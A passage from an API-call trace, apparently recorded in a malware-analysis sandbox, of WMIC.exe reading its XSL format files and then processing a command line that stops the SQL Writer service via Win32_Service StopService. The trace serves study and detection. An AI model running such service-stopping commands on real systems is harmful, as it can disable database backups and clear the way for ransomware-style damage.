wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0283.156] malloc (_Size=0xc) returned 0x2b3ade0 [0283.156] malloc (_Size=0xc) returned 0x2b3adc8 [0283.156] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0283.156] SysStringLen (param_1="TABLE") returned 0x5 [0283.156] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0283.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.156] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0283.156] SysStringLen (param_1="XML") returned 0x3 [0283.156] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0283.156] SysStringLen (param_1="texttablewsys") returned 0xd [0283.156] SysStringLen (param_1="XML") returned 0x3 [0283.156] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0283.157] malloc (_Size=0x18) returned 0x2b32b20 [0283.157] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.157] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.157] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.157] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=16, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.157] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="htable.xsl") returned 0x0 [0283.157] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.157] malloc (_Size=0xc) returned 0x2b3ac60 [0283.157] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.157] free (_Block=0x2b3ac60) [0283.157] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0283.157] malloc (_Size=0xc) returned 0x2b3ac60 [0283.157] malloc (_Size=0xc) returned 0x2b3abb8 [0283.158] SysStringLen (param_1="htable-sortby") returned 0xd [0283.158] SysStringLen (param_1="TABLE") returned 0x5 [0283.158] SysStringLen (param_1="htable-sortby") returned 0xd [0283.158] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.158] SysStringLen (param_1="htable-sortby") returned 0xd [0283.158] SysStringLen (param_1="XML") returned 0x3 [0283.158] SysStringLen (param_1="htable-sortby") returned 0xd [0283.158] SysStringLen (param_1="texttablewsys") returned 0xd [0283.158] SysStringLen (param_1="htable-sortby") returned 0xd [0283.158] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0283.158] SysStringLen (param_1="XML") returned 0x3 [0283.158] SysStringLen (param_1="htable-sortby") returned 0xd [0283.158] malloc (_Size=0x18) returned 0x2b32a80 [0283.158] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.158] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.158] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.158] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=17, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.158] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="mof.xsl") returned 0x0 [0283.158] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.159] malloc (_Size=0xc) returned 0x2b3ac78 [0283.159] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.159] free (_Block=0x2b3ac78) [0283.159] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0283.159] malloc (_Size=0xc) returned 0x2b3ac00 [0283.159] malloc (_Size=0xc) returned 0x2b3ac78 [0283.159] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0283.159] SysStringLen (param_1="TABLE") returned 0x5 [0283.159] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0283.159] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.159] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0283.159] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.159] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0283.159] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.159] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.159] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0283.159] malloc (_Size=0x18) returned 0x2b32aa0 [0283.160] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.160] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.160] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.160] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=18, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.160] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="mof.xsl") returned 0x0 [0283.160] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.160] malloc (_Size=0xc) returned 0x2b3adf8 [0283.160] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.160] free (_Block=0x2b3adf8) [0283.160] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0283.160] malloc (_Size=0xc) returned 0x2b3acd8 [0283.161] malloc (_Size=0xc) returned 0x2b3acc0 [0283.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0283.161] SysStringLen (param_1="TABLE") returned 0x5 [0283.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0283.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0283.161] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0283.161] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0283.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0283.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0283.161] malloc (_Size=0x18) returned 0x2b32b40 [0283.161] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.161] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.161] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.161] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=19, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.161] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="textvaluelist.xsl") returned 0x0 [0283.161] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.162] malloc (_Size=0xc) returned 0x2b3acf0 [0283.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.162] free (_Block=0x2b3acf0) [0283.162] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0283.162] malloc (_Size=0xc) returned 0x2b3adf8 [0283.162] malloc (_Size=0xc) returned 0x2b3acf0 [0283.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0283.162] SysStringLen (param_1="TABLE") returned 0x5 [0283.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0283.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0283.162] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0283.162] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.162] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0283.162] malloc (_Size=0x18) returned 0x2b32ac0 [0283.162] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.163] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.163] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.163] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=20, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.163] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="textvaluelist.xsl") returned 0x0 [0283.163] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.163] malloc (_Size=0xc) returned 0x2b3ab10 [0283.163] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.163] free (_Block=0x2b3ab10) [0283.163] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0283.163] malloc (_Size=0xc) returned 0x2b3aba0 [0283.163] malloc (_Size=0xc) returned 0x2b3ab10 [0283.163] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0283.163] SysStringLen (param_1="TABLE") returned 0x5 [0283.163] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0283.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0283.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0283.164] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0283.164] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0283.164] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.164] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0283.164] malloc (_Size=0x18) returned 0x2b32b60 [0283.164] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.164] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.164] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.164] IUnknown:Release (This=0x2ae9ca0) returned 0x0 [0283.164] FreeThreadedDOMDocument:IUnknown:Release (This=0x2ae6b48) returned 0x1 [0283.164] FreeThreadedDOMDocument:IUnknown:Release (This=0x2ae45a8) returned 0x0 [0283.164] free (_Block=0x2b398e0) [0283.164] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice" [0283.164] malloc (_Size=0xe0) returned 0x2b3aee8 [0283.165] memcpy_s (in: _Destination=0x2b3aee8, _DestinationSize=0xde, _Source=0x2da1b78, _SourceSize=0xd2 | out: _Destination=0x2b3aee8) returned 0x0 [0283.165] malloc (_Size=0xc) returned 0x2b3ad08 [0283.165] malloc (_Size=0xc) returned 0x2b3ad50 [0283.165] malloc (_Size=0xc) returned 0x2b3ad68 [0283.165] malloc (_Size=0xc) returned 0x2b3ad20 [0283.165] malloc (_Size=0x80) returned 0x2b3afd0 [0283.165] GetLocalTime (in: lpSystemTime=0x89f58c | out: lpSystemTime=0x89f58c*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x31, wMilliseconds=0xd8)) [0283.165] _vsnwprintf (in: _Buffer=0x2b3afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x89f56c | out: _Buffer="04-02-2020T08:28:49") returned 19 [0283.165] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.165] malloc (_Size=0x8e) returned 0x2b3b058 [0283.165] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.165] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.165] malloc (_Size=0x8e) returned 0x2b3b0f0 [0283.165] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.165] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.165] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.165] malloc (_Size=0xa) returned 0x2b3ad80 [0283.165] lstrlenW (lpString="path") returned 4 [0283.165] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0283.166] malloc (_Size=0xa) returned 0x2b3abd0 [0283.166] malloc (_Size=0x4) returned 0x2b32ee8 [0283.166] free (_Block=0x0) [0283.166] free (_Block=0x2b3ad80) [0283.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.166] malloc (_Size=0x1c) returned 0x2b39da8 [0283.166] lstrlenW (lpString="Win32_Service") returned 13 [0283.166] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0283.166] malloc (_Size=0x1c) returned 0x2b30568 [0283.166] malloc (_Size=0x8) returned 0x2b30590 [0283.166] memmove_s (in: _Destination=0x2b30590, _DestinationSize=0x4, _Source=0x2b32ee8, _SourceSize=0x4 | out: _Destination=0x2b30590) returned 0x0 [0283.166] free (_Block=0x2b32ee8) [0283.166] free (_Block=0x0) [0283.166] free (_Block=0x2b39da8) [0283.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.166] malloc (_Size=0xc) returned 0x2b3ad80 [0283.166] lstrlenW (lpString="where") returned 5 [0283.166] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0283.166] malloc (_Size=0xc) returned 0x2b3ad98 [0283.166] malloc (_Size=0xc) returned 0x2b3ab40 [0283.166] memmove_s (in: _Destination=0x2b3ab40, _DestinationSize=0x8, _Source=0x2b30590, _SourceSize=0x8 | out: _Destination=0x2b3ab40) returned 0x0 [0283.166] free (_Block=0x2b30590) [0283.166] free (_Block=0x0) [0283.166] free (_Block=0x2b3ad80) [0283.166] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.166] malloc (_Size=0x38) returned 0x2b3b188 [0283.166] lstrlenW (lpString="\"name like '%%SQLWriter%%'\"") returned 27 [0283.167] _wcsicmp (_String1="\"name like '%%SQLWriter%%'\"", _String2="\"NULL\"") returned -20 [0283.167] lstrlenW (lpString="\"name like '%%SQLWriter%%'\"") returned 27 [0283.167] lstrlenW (lpString="\"name like '%%SQLWriter%%'\"") returned 27 [0283.167] malloc (_Size=0x38) returned 0x2b3b1c8 [0283.167] malloc (_Size=0x10) returned 0x2b3abe8 [0283.167] memmove_s (in: _Destination=0x2b3abe8, _DestinationSize=0xc, _Source=0x2b3ab40, _SourceSize=0xc | out: _Destination=0x2b3abe8) returned 0x0 [0283.167] free (_Block=0x2b3ab40) [0283.167] free (_Block=0x0) [0283.167] free (_Block=0x2b3b188) [0283.167] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.167] malloc (_Size=0xa) returned 0x2b3ad80 [0283.167] lstrlenW (lpString="call") returned 4 [0283.167] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0283.167] malloc (_Size=0xa) returned 0x2b3ab40 [0283.167] malloc (_Size=0x18) returned 0x2b32c60 [0283.167] memmove_s (in: _Destination=0x2b32c60, _DestinationSize=0x10, _Source=0x2b3abe8, _SourceSize=0x10 | out: _Destination=0x2b32c60) returned 0x0 [0283.167] free (_Block=0x2b3abe8) [0283.167] free (_Block=0x0) [0283.167] free (_Block=0x2b3ad80) [0283.167] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice") returned 70 [0283.167] malloc (_Size=0x18) returned 0x2b32be0 [0283.167] lstrlenW (lpString="stopservice") returned 11 [0283.167] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0283.167] malloc (_Size=0x18) returned 0x2b32d40 [0283.167] free (_Block=0x0) [0283.167] free (_Block=0x2b32be0) [0283.167] malloc (_Size=0x18) returned 0x2b32be0 [0283.167] lstrlenW (lpString="QUIT") returned 4 [0283.167] lstrlenW (lpString="path") returned 4 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0283.168] lstrlenW (lpString="EXIT") returned 4 [0283.168] lstrlenW (lpString="path") returned 4 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0283.168] free (_Block=0x2b32be0) [0283.168] WbemLocator:IUnknown:AddRef (This=0x2db4838) returned 0x2 [0283.168] malloc (_Size=0x18) returned 0x2b32be0 [0283.168] lstrlenW (lpString="/") returned 1 [0283.168] lstrlenW (lpString="path") returned 4 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0283.168] lstrlenW (lpString="-") returned 1 [0283.168] lstrlenW (lpString="path") returned 4 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0283.168] lstrlenW (lpString="CLASS") returned 5 [0283.168] lstrlenW (lpString="path") returned 4 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0283.168] lstrlenW (lpString="PATH") returned 4 [0283.168] lstrlenW (lpString="path") returned 4 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0283.168] lstrlenW (lpString="/") returned 1 [0283.168] lstrlenW (lpString="Win32_Service") returned 13 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0283.168] lstrlenW (lpString="-") returned 1 [0283.168] lstrlenW (lpString="Win32_Service") returned 13 [0283.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0283.168] lstrlenW (lpString="Win32_Service") returned 13 [0283.168] malloc (_Size=0x1c) returned 0x2b39da8 [0283.169] lstrlenW (lpString="Win32_Service") returned 13 [0283.169] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x94ba654c | out: _String="Win32_Service", _Context=0x94ba654c) returned="Win32_Service" [0283.169] lstrlenW (lpString="Win32_Service") returned 13 [0283.169] malloc (_Size=0x1c) returned 0x2b3b188 [0283.169] lstrlenW (lpString="Win32_Service") returned 13 [0283.169] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x94ba654c | out: _String=0x0, _Context=0x94ba654c) returned 0x0 [0283.169] lstrlenW (lpString="") returned 0 [0283.169] lstrlenW (lpString="WHERE") returned 5 [0283.169] lstrlenW (lpString="where") returned 5 [0283.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0283.169] lstrlenW (lpString="/") returned 1 [0283.169] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0283.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLWriter%%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0283.169] lstrlenW (lpString="-") returned 1 [0283.169] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0283.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLWriter%%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0283.169] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0283.169] malloc (_Size=0x34) returned 0x2b3b208 [0283.169] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0283.169] lstrlenW (lpString="/") returned 1 [0283.169] lstrlenW (lpString="call") returned 4 [0283.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0283.170] lstrlenW (lpString="-") returned 1 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] malloc (_Size=0xa) returned 0x2b3ad80 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] lstrlenW (lpString="GET") returned 3 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0283.170] lstrlenW (lpString="LIST") returned 4 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0283.170] lstrlenW (lpString="SET") returned 3 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0283.170] lstrlenW (lpString="CREATE") returned 6 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0283.170] lstrlenW (lpString="CALL") returned 4 [0283.170] lstrlenW (lpString="call") returned 4 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0283.170] lstrlenW (lpString="/") returned 1 [0283.170] lstrlenW (lpString="stopservice") returned 11 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0283.170] lstrlenW (lpString="-") returned 1 [0283.170] lstrlenW (lpString="stopservice") returned 11 [0283.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0283.170] lstrlenW (lpString="stopservice") returned 11 [0283.170] malloc (_Size=0x18) returned 0x2b32cc0 [0283.170] lstrlenW (lpString="stopservice") returned 11 [0283.171] ??0CHString@@QAE@XZ () returned 0x89d454 [0283.171] GetCurrentThreadId () returned 0x10e4 [0283.171] GetCurrentThreadId () returned 0x10e4 [0283.171] ??0CHString@@QAE@XZ () returned 0x89d3dc [0283.171] malloc (_Size=0x4) returned 0x2b32ee8 [0283.171] malloc (_Size=0xc) returned 0x2b3abe8 [0283.171] malloc (_Size=0xc) returned 0x2b3ae10 [0283.171] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2db4838, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x2dbaca0) returned 0x0 [0283.236] free (_Block=0x2b3ae10) [0283.236] CoSetProxyBlanket (pProxy=0x2dbaca0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0283.236] free (_Block=0x2b32ee8) [0283.236] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0283.236] free (_Block=0x2b3abe8) [0283.236] malloc (_Size=0xc) returned 0x2b3abe8 [0283.236] IWbemServices:GetObject (in: This=0x2dbaca0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x89d46c*=0x0, ppCallResult=0x0 | out: ppObject=0x89d46c*=0x2e10468, ppCallResult=0x0) returned 0x0 [0283.310] free (_Block=0x2b3abe8) [0283.310] IWbemClassObject:BeginMethodEnumeration (This=0x2e10468, lEnumFlags=0) returned 0x0 [0283.310] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="StartService", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2e10660) returned 0x0 [0283.310] lstrlenW (lpString="StartService") returned 12 [0283.310] lstrlenW (lpString="stopservice") returned 11 [0283.310] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0283.310] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.310] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="StopService", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2e10660) returned 0x0 [0283.310] lstrlenW (lpString="StopService") returned 11 [0283.310] lstrlenW (lpString="stopservice") returned 11 [0283.310] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0283.310] malloc (_Size=0x38) returned 0x2b3b9b8 [0283.311] ??0CHString@@QAE@XZ () returned 0x89cfbc [0283.311] GetCurrentThreadId () returned 0x10e4 [0283.311] IWbemClassObject:GetNames (in: This=0x2e10660, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x89cfcc | out: pNames=0x89cfcc*="\x01ƀ\x04") returned 0x0 [0283.312] SafeArrayGetLBound (in: psa=0x2de2770, nDim=0x1, plLbound=0x89cfb8 | out: plLbound=0x89cfb8) returned 0x0 [0283.312] SafeArrayGetUBound (in: psa=0x2de2770, nDim=0x1, plUbound=0x89cfb4 | out: plUbound=0x89cfb4) returned 0x0 [0283.312] SafeArrayGetElement (in: psa=0x2de2770, rgIndices=0x89cfc0, pv=0x89cfd0 | out: pv=0x89cfd0) returned 0x0 [0283.312] malloc (_Size=0x24) returned 0x2b3b9f8 [0283.312] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2e10660, wszProperty="ReturnValue", ppQualSet=0x89cee0 | out: ppQualSet=0x89cee0*=0x2dbafd0) returned 0x0 [0283.312] malloc (_Size=0xc) returned 0x2b3abe8 [0283.312] IWbemQualifierSet:Get (in: This=0x2dbafd0, wszName="CIMTYPE", lFlags=0, pVal=0x89ceb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x89ceb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0283.313] free (_Block=0x2b3abe8) [0283.313] malloc (_Size=0xc) returned 0x2b3abe8 [0283.313] IWbemClassObject:Get (in: This=0x2e10660, wszName="ReturnValue", lFlags=0, pVal=0x89ce88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x89cec4*=9031340, plFlavor=0x0 | out: pVal=0x89ce88*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x89cec4*=19, plFlavor=0x0) returned 0x0 [0283.313] malloc (_Size=0xc) returned 0x2b3aea0 [0283.313] IWbemQualifierSet:Get (in: This=0x2dbafd0, wszName="read", lFlags=0, pVal=0x89cec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: 